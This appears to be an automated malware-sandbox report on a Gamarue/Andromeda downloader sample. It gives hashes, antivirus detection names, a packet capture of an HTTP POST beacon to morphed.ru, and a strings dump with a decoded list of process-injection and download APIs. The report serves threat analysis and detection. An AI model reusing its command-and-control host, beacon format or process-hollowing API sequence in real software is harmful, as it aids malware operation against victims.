Analysis Date: 2016-11-14 18:01:12
MD5: 157dda2b890fd2f08e4c2742eac91248
SHA1: 21b683a4fb6cbf8191098ecb07581b174fda24ff

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: a3e1ce6e0f137852446165856a8e7045 sha1: 065709db243457d504a0cd1baf1253d54b9da3df size: 19456
Section .data md5: f859f3e20b63fac333f0da1cfcaef96c sha1: 4e7e9f1e381b3d29223c6d529543120d9bb27a6f size: 2048
Section .xcpad md5: sha1: size:
Section .idata md5: sha1: size:
Section .reloc md5: sha1: size:
Section .rsrc md5: c56c8b813e9c244f0064febc3beb8e08 sha1: 8d896befe537b098749031dc876acd959d995435 size: 67072
Timestamp
VersionLegalCopyright:
PackagerVersion:
InternalName:
FileVersion:
CompanyName:
Comments:
ProductName:
ProductVersion:
FileDescription:
Packager:
OriginalFilename:
Packer: Installer VISE Custom
PEhash
IMPhash: de1d6cbe23c278509e0a7f5966a20354
AV 360 Safe: Worm.Win32.Gamarue.V
AV Ad-Aware: Gen:Variant.Symmi.22996
AV Alwil (avast): ?
AV Arcabit (arcavir): Gen:Variant.Symmi.22996
AV Authentium: W32/A-49bf794c!Eldorado
AV Avira (antivir): TR/Rogue.22761
AV BitDefender: Gen:Variant.Symmi.22996
AV BullGuard: Gen:Variant.Symmi.22996
AV CA (E-Trust Ino): Gen:Variant.Symmi.22996
AV CAT (quickheal): Worm.Gamarue.B
AV ClamAV: Win.Trojan.Downloader-61798
AV Dr. Web: BackDoor.Andromeda.178
AV Emsisoft: Gen:Variant.Symmi.22996
AV Eset (nod32): Win32/Injector.AIOX
AV F-Secure: Trojan-Downloader:W32/Wauchos.F
AV Fortinet: W32/Kryptik.BBYD!tr
AV Frisk (f-prot): No Virus
AV Grisoft (avg): Dropper.Generic8.BBQY
AV Ikarus: Trojan-Downloader.Win32.Andromeda
AV K7: Trojan ( 0043b77a1 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Trojan.Agent
AV Mcafee: Downloader-FOS!157DDA2B890F
AV MicroWorld (escan): Gen:Variant.Symmi.22996
AV Microsoft Security Essentials: Worm:Win32/Gamarue.AJ
AV Rising: Trojan.Win32.Read.a
AV SUPERAntiSpyware: Trojan.Agent/Gen-Dofoil
AV Symantec: Downloader.Dromedan
AV Trend Micro: WORM_GAMARUE.SMJ
AV Twister: Trojan.D875EDBFBC8E8805
AV VirusBlokAda (vba32): SScope.Worm.Gamarue.2713
AV Windows Defender: Worm:Win32/Gamarue.AJ
AV Zillya!: Downloader.Andromeda.Win32.3263

Runtime Details:

Screenshot

Process
↳ C:\21b683a4fb6cbf8191098ecb07581b174fda24ff.exe

Creates File: C:\WINDOWS\WindowsShell.Manifest

Network Details:


Raw Pcap
0x00000000 (00000)   504f5354 202f7374 61746963 2e706870   POST /static.php
0x00000010 (00016)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000020 (00032)   206d6f72 70686564 2e72750d 0a557365    morphed.ru..Use
0x00000030 (00048)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000040 (00064)   2f342e30 0d0a436f 6e74656e 742d5479   /4.0..Content-Ty
0x00000050 (00080)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000060 (00096)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x00000070 (00112)   636f6465 640d0a43 6f6e7465 6e742d4c   coded..Content-L
0x00000080 (00128)   656e6774 683a2038 340d0a43 6f6e6e65   ength: 84..Conne
0x00000090 (00144)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x000000a0 (00160)   75707163 68537737 76464841 4575646e   upqchSw7vFHAEudn
0x000000b0 (00176)   6d594b47 4977694c 7258387a 554e3638   mYKGIwiLrX8zUN68
0x000000c0 (00192)   54337971 76685175 32547165 74516e33   T3yqvhQu2TqetQn3
0x000000d0 (00208)   71497937 51366270 54664455 74594966   qIy7Q6bpTfDUtYIf
0x000000e0 (00224)   745a3333 4e427342 4c677367 396d5933   tZ33NBsBLgsg9mY3
0x000000f0 (00240)   71773d3d                              qw==


Strings
h(s@
h4p@
h(s@
j*j;
j/jb
jcj!j
jUjO
j!jc
QjNj
jFj(
}vj*h
j	jA
jAj>j$
tYj8jbj
jHja
jhj!
j	jE
tZj0j\jM
j!j%
j-jW
jcj
j%j(
j4j*
j\j3j
QWj[j
jEjw
=0p@
j9jdj
j1jRjE
h`"@
XSVW
Yt4^
YYh p@
<"u%
F<"t
t9UW
?=t"U
QQS3
PSSW
8"uD
8"uF@
8"u,
-D`@
@@f9
@@f9
=<`@
SS@SSPVSS
t#SSUP
t$$VSS
_^][YY
DSUVWh
_^][
8MZu
t>j,P
Yt0@
SVWUj
]_^[
t.;t$$t(
VC20XC00U
SVWU
tEVU
t3x<
]_^[
=4s@
A=pt@
=4s@
hhc@
5d`@
uiSj
uY;]
pD#U
j #M
j?^;
SUVWu
-t`@
=pt@
=tt@
5tt@
_^][
5tt@
Y;5tt@
QQSV
sN;E
u%C@
Y;5t
90tr
Wj@Y3
t7SW

@AA;
Vt6P
<Xt
u,9E
^_[3
^[_3
VWuBh
tzVS
GIt%
t/Ku
uFWWj
"WWSh
9} u
E WW
tMWWS
t@9}
VSh
h(d@
%l`@
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error
TLOSS error
SING error
DOMAIN error
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
abnormal program termination
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program:
<program name unknown>
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
LoadLibraryA
GetProcAddress
GetTickCount
GetModuleFileNameA
KERNEL32.dll
GetModuleHandleA
GetStartupInfoA
GetCommandLineA
GetVersion
ExitProcess
HeapAlloc
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetEnvironmentVariableA
GetVersionExA
HeapDestroy
HeapCreate
VirtualFree
HeapFree
RtlUnwind
WriteFile
VirtualAlloc
HeapReAlloc
GetCPInfo
GetACP
GetOEMCP
MultiByteToWideChar
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
}Svo}Gbtu}MpbeMjcsbszB}ouemm/emm}xjojofu/emm}pmf43/emm}tifmm43/emm}HfuNpevmfIboemfB}XsjufQspdfttNfnpsz}DsfbufQspdfttX}TfuUisfbeDpoufyu}HfuUisfbeDpoufyu}SftvnfUisfbe}GjoeSftpvsdfB}MpbeSftpvsdf}Tj{fpgSftpvsdf}WjsuvbmBmmpdFy}OuVonbqWjfxPgTfdujpo}DpoujovfEfcvhFwfou}XbjuGpsEfcvhFwfou}SfbeQspdfttNfnpsz}DsfbufUppmifmq43Tobqtipu}Npevmf43Gjstu}PvuqvuEfcvhTusjohB}DmptfIboemf}FyjuQspdftt}HfuDvssfouQspdftt}DsfbufUisfbe}XbjuGpsTjohmfPckfdu}TfuGjmfBuusjcvuftX}JoufsofuPqfoB}JoufsofuPqfoVsmB}JoufsofuSfbeGjmf}EfmfufVsmDbdifFousz}JoufsofuDmptfIboemf}HmpcbmGsff}HmpcbmBmmpd}TfuVoiboemfeFydfqujpoGjmufs}NvmujCzufUpXjefDibs}TIHfuTqfdjbmGpmefsQbuiX}DpJojujbmj{f}DpDsfbufJotubodf}mtusdqzX}mtusdbuX}HfuNpevmfGjmfObnfX
(Reviewer note: the string above is a plain character-shift encoding; subtracting 1 from each byte yields the `|`-separated list Run|Fast|LoadLibraryA|ntdll.dll|wininet.dll|ole32.dll|shell32.dll|GetModuleHandleA|WriteProcessMemory|CreateProcessW|SetThreadContext|GetThreadContext|ResumeThread|FindResourceA|LoadResource|SizeofResource|VirtualAllocEx|NtUnmapViewOfSection|ContinueDebugEvent|WaitForDebugEvent|ReadProcessMemory|CreateToolhelp32Snapshot|Module32First|OutputDebugStringA|CloseHandle|ExitProcess|GetCurrentProcess|CreateThread|WaitForSingleObject|SetFileAttributesW|InternetOpenA|InternetOpenUrlA|InternetReadFile|DeleteUrlCacheEntry|InternetCloseHandle|GlobalFree|GlobalAlloc|SetUnhandledExceptionFilter|MultiByteToWideChar|SHGetSpecialFolderPathW|CoInitialize|CoCreateInstance|lstrcpyW|lstrcatW|GetModuleFileNameW — library and API names that do not appear in the visible import list, consistent with the LoadLibraryA / GetProcAddress entries above. The decoded names are a useful static indicator for detection rules on this sample.)
Read
kernel32.dll
GetProcAddress
5>Cv
Vku=JPM_l
!<Vd
*?<Wol
DawWv
BUjq
+vbSp
eW@
T6j=I
hw1^s
[OY4
(QPg
p&h*
&D#rpp
vV@J
T<'^
O&V9
)D5K
#1G&
	?02<
md,bR
a)s(xy
SoHe
jLfXg
&xk'
v;vfUb
rAg/V%
al.-
{i\X
+-~zz
,`s{
^#Z;
#vzv
KD@Y-
\]7M\
o#k6@
YJ7O
SbE<
(lwtc
6B1i
[)b>
VNE#v
sr$(p8
j$c|H(#2
Z1}?
a9R[
z\ q8}
6|*n
&-i=;
FC;U
B4XY
K-Yu
~YlT
|iTB^
wL}#
_'i.
 7TY
3X+_
3%O<
P{[>w
	FY:Y
[>sf
3=QW^
9Cckx
*Nrkj
d(Z?
=?5b=<
PAgJR
W@H7
Z`P_
X1yy
r(\2
Lz?Vh
\}H+
 8MQ
:{U3
PVo?
QE}|
}	Z:1
|9Wn
^Hl8
U8yP
xVL4a+
uze"
mf"j
:uF&a
k:L7`s
,53@
"[,B
<4q]
V_g4
2F#L
rz6l
@P$N
+ESf
&`w!
 9'Ty
^' @L
qx!vp
geuje
!v[r0j
}]B$Q
9T*$N
	;R<}
JXT!n
5l"?
)!Hr
4-TU_K
=zIT
#V\B
By B
	;tV
6y8A
TxzmK
8zhxD
.4?G
i_(;
D:TTl
hxhS
;Iw9
bu+2
z01t)
9lNL
uc;H1}
8qCc+`x
B/4:
"MBA
DZBZ@u
H]Vw
PBe^
(=yg]
^=5Dm
MkR:
D=bn%
Pj)y
@V:g
&,4b
e&%q
R/FV
'N3s
.-Rf
bCU,
#n)|O
P)HD
)M'B6
D<k;
YA<{
Y';+
C%+b
qigV
$KIkbO'
%>'Q4
8qXa
\%2_}
uO%S
-|d4
L']v#
-#9?
"thZ
'`n3
!5Fa
&9mC)!@
};EQ9
k@f;l
YY'O3e'
#&JF
t,-M
&buys
-: y
,I/^`
ojs}
|5*)
r^js
vd*D
!}%'Y
r:Y6
$@)v
LyH.
Q0P%k
|z!5
i :TE
mtjmyu
c_92Nn
'P6d
g?iz
s:d!
p?o^
Af.z4|
>_W}m5z<
slTp~
	L	6
OR".
<Y"{
[>.Um&
	YSw
Z=F)q8/
B^G8){kcn
<M<J
2%@,
oEYW
80l(
%G'8
}9Y6-`1
"U|3
foed
bXsN
/=>l_;
p?h6
[C%g$
LK#:
N8z|B
7#@V
-r	$
6Es{
JhWX2
oIL3
c7{G
)*-H
jRU4p
*U3O
UEQS
#j3?
qA>j
.\Fut
(0C@
URT?
Y06u"D
Iro(
X2c4B\
WA)LA+
	WWy~
o#.$
/RmG
s8X&
,-TN
xqdI$O
S.Ro
!tLk
L6NmA
Wm:)"
dIQ<
H(S&z
7p%j
6rCQ
SCmQ
%2Hr
TRRDyY
EO>H,9
gHdF
u(@;
A5V&
Qu\t*#=N
XOF9
'&/clm
7u6E
bd(nEH
XQqF
51QB=+y
XArf
8H=$
'/P-
20aPp
fmS.)
-9^hA
@3*T
pwD_B3/
e!jJ{
"J	G
1X#n
)N*sZ
h~X8""
QPsZ
H5N4b
c{;+
)`*4
Xl&D
uqDe
S1 YM
,anz
p~QZ
#8_/
A-M]
H7NH
hflO
:]:U
<ocG
}<1I
5|X*
*[Jk$
j-vs
vgZQ
fWdk
*Th65G
S@K;
ALy=+
(e'q
i@QCC
Rl!*<gI
H_6%
zEYg
5n_afi
g*%&?c
P6}H
OiV~p
l`Co
j+ 6
(t)I
~Goj
0Gi{
l[(PX
8/'r
xT1M
]?L~g
>mi`U
qAb?
r\A=
n|S"
&M`)
CB[l
H.}mrD
}A]O!
9$cz>,
mgmH
`KSPSV
xXV_
S`I"u
zn#S(o	W
I8hD
=Zo-_Uc
q{zo
Drd6
jGaE
7hCa
H72
(Y[~4
y~hw
A,,i
w4gi
j{)=
Em[#
aV^1
	C~!G
;v[t
kKU&F
|e)
}xF2
bwQ@
!z{2?
w	,[
"qK)1
[0QX
5<%!40
po|2
_X=u
hA~v
sJOy
AY_e1
pwY
Sq"i
4;u08
fT^Q
0Q-B~
<VGX5
R%l#
o/i`
h)C:U
#)t7